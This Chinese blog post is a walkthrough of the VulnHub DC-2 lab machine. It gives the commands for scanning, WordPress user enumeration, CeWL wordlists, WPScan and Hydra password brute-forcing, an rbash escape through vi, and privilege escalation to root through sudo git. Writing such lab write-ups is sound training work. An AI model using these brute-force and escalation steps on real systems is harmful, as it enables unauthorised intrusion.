靶场之DC-2

最新推荐文章于 2024-03-22 16:24:40 发布
最新推荐文章于 2024-03-22 16:24:40 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 靶场 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sunxueer/article/details/119144617
版权

DC-2

环境:

靶机名称:DC-2

攻击机:kali 192.168.78.135

1. 打开虚拟机

  • 导入.ova文件,开启虚拟机

image-20210727083503793

2. 信息收集

2.1 nmap扫描存活主机确定DC-2的ip地址
nmap -sP 192.168.78.0/24

image-20210727083653041

  • IP 为192.168.78.128
2.2 利用namp扫描DC-2开放的端口
nmap -sV -A -p- 192.168.78.128
-sV探测服务器版本

image-20210727150921898

  • 发现开启了http和ssh服务,并且ssh服务的端口是7744
2.3 访问一下80端口

image-20210727084123659

  • 发现输入IP回车访问后,有域名限制,不能访问到dc-2,http-title: Did not follow redirect to http://dc-2/(未能重定向)

  • 添加DNS解析记录,在C:\Windows\System32\drivers\etc中的hosts文件中添加对应的解析记录

192.168.78.128    dc-2
  • 删除缓存,重新访问
    在这里插入图片描述
2.4 尝试寻找该网站的CMS

image-20210727091126322

3. 寻找flag

3.1 寻找flag1
  • 在网站首页

image-20210727092056740

  • 提示我们使用cewl,尝试登录用户

  • cewl是kali自带的能够生成密码字典的工具

3.2 寻找flag2

  • 根据上文提示,我们需要登录到wordpress的后台,那么如何寻找wordpress的后台登录地址

  • 对网站进行目录扫描,找到后台登录地址,这里我用的御剑后台扫描

image-20210727094216548

  • 访问后台登录页面
    image-20210727092911676

  • 发现用户名和密码都需要爆破

  • 使用漏扫工具wpscan

补充

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

学习网址:https://idc.wanyunshuju.com/aqst/1885.html

wpscan --ignore-main-redirect --url http://192.168.78.128 --enumerate u --force

image-20210727095648775

  • 扫描出三个用户名:admin,tom,jerry

  • 或者使用nessus漏扫工具,也可以扫到用户名

image-20210727095806721

  • 接下来根据flag1的提示,使用cewl生成密码

补充

cewl是一个 ruby 应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到John the ripper工具里进行密码破解。cewl还有一个相关的命令行 工具 应用FAB,它使用相同的元数据提取技术从已下载的列表中创建作者/创建者列表。

学习网址:https://www.codercto.com/a/44828.html

cewl http://dc-2/ -w passwd.txt
-w//表示把生成的密码写入这个文件

image-20210727100656621

  • 用户名已知,密码字典已知,用wpscan爆破密码
wpscan --ignore-main-redirect --url http://dc-2/ -U user.txt -P passwd.txt -t 30

image-20210727102341608

  • 或者使用burpsuite爆破

image-20210727102954135

  • 登录到tom和jerry的后台查看
  • 发现jerry的后台有flag2

image-20210727103333952

  • 提示我们寻找另一个切入点
3.3 寻找flag3
  • 根据上文提示的另一个切入点,尝试利用ssh(只有两个服务)
  • 利用上文的用户名和密码字典,通过hydra爆破ssh登录密码
hydra -t 32 -l admin -P passwd.txt -s 7744 192.168.78.128 ssh
hydra -t 32 -l tom -P passwd.txt -s 7744 192.168.78.128 ssh
hydra -t 32 -l jerry -P passwd.txt -s 7744 192.168.78.128 ssh
  • 发现只有tom能爆破出密码

image-20210727103958602

  • 利用ssh登录tom

image-20210727104037532

  • 发现没有cat命令,利用vi flag3.txt

image-20210727104201174

3.4 寻找flag4.txt
  • 根据上文提示我们需要su到jerry用户

image-20210727104639961

  • 找不到该命令
  • 查看一下passwd信息,发现tom是/bin/rbash

image-20210727104830391

补充

什么是rbash?

受限shell是LinuxShell限制一些bash shell中的功能,并且是从名字上很清楚。 该限制很好地实现了命令以及脚本在受限shell中运行。 它为Linux中的bash shell提供了一个额外的安全层。

  • 绕过rbash

学习网址:https://cloud.tencent.com/developer/article/1680551

​ https://blog.csdn.net/qq_43168364/article/details/111830233

  • 这里我们使用vi编辑器来绕过rbash
//新建一个文件,末行命令,回车
vi test
:set shell=/bin/sh
:shell
//设置环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

image-20210727114405404

  • 尝试su到jerry,发现成功并且找到flag4.txt

image-20210727114542696

  • 提示我们使用git
3.4 寻找the final flag

  • 根据上文提示,使用git提权

  • git提权:

    1、sudo git help config #在末行命令模式输入
    !/bin/bash 或 !‘sh’ #完成提权
    2、sudo git -p help
    !/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell

  • 提权成功后,找到最后的flag

image-20210727115627307

总结

  • 学会绕过rbash限制shell,以及git提权
SXE
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC-2打靶笔记
2201_75316477的博客
07-23 77
DC-2
DC-2靶场
mlws1900的博客
03-22 844
直接点击无法下载可以用迅雷下设置网络为nat模式,其他的错误全部点重试和是打开靶机,启动如下图所示。
DC-2靶机进行渗透测试
zll___的博客
03-11 645
DC-2靶机进行渗透测试
DC-2靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-02 6179
DC-2靶场渗透实战过程
DC-2靶场实战详解
热门推荐
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
靶机3 DC-2(过程超详细)
honest_gg的博客
09-26 1431
DC靶场一共有9个,对于学习渗透测试人员,有很大的帮助,是非常不错的靶场
【DC系列】DC-2靶机实战详细讲解
weixin_44681307的博客
06-28 362
wpscan --url http://dc-2/ --enumerate u 可以查找这个网站有什么用户名,这样我们用户名也就都有了。然后我们打开网站,在Flag看到了提醒,就是告诉我们只需要cewl扫描出来的字典就行,密码都在这里面。进去后我们发现好多命令都不能用,甚至cd都不能用,经过尝试发现vi这个命令可以用,less也可以用。cewl http://dc-2 (-d 目录深度,默认是2.-w 写到一个文件中)这时候执行这个代码,命令权限就有了,原本su命令是不能用的,现在就可以用了。
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
【DC系列】DC-2靶场
qq_51611948的博客
02-14 1070
详细介绍DC2靶机渗透全过程
DC-2完整的渗透测试过程
weixin_51097397的博客
07-04 395
1.此次DC-2的渗透用到了如下几种工具的基础使用①arp-scan②namp③dirsearch④cewl⑤wpscan2.学到了修改本地hosts3.学会rbash逃逸BASH_CMDS [ r ] = /bin/bash #设置变量r为一个shell r #执行这个shell #添加环境变量 export PATH = $PATH :/bin/ export PATH = $PATH :/usr/bin/4.学会git提权。
靶机DC-2 WP
m0_66638011的博客
05-13 538
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。DC-2靶场攻破过程:1、我们先进行信息收集,发现了http协议和ssh协议,更改DNS后进入网页,发现了flag1。
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2683
DC-2靶机渗透测试思路及流程
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1776
dc-2实验
DC-2靶机详解
TonyChaoWei的博客
02-07 1276
上面使用了 wpscan 进行了扫描和爆破,但是漏洞扫描没有任何结果,因为现在 wpscan 扫描漏洞需要 API Token 的支持,所以需要访问 https://wpvulndb.com/users/sign_up 注册一个账号,获得 API Token。根据信息,CVE 编号为 CVE-2019-8942、CVE-2019-8943,MSF 里正好有模块,不过其实是不好利用的,因为这个漏洞是通过文件上传造成的,而 jerry 和 tom 都无法上传,只有 admin 有权限修改上传点。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值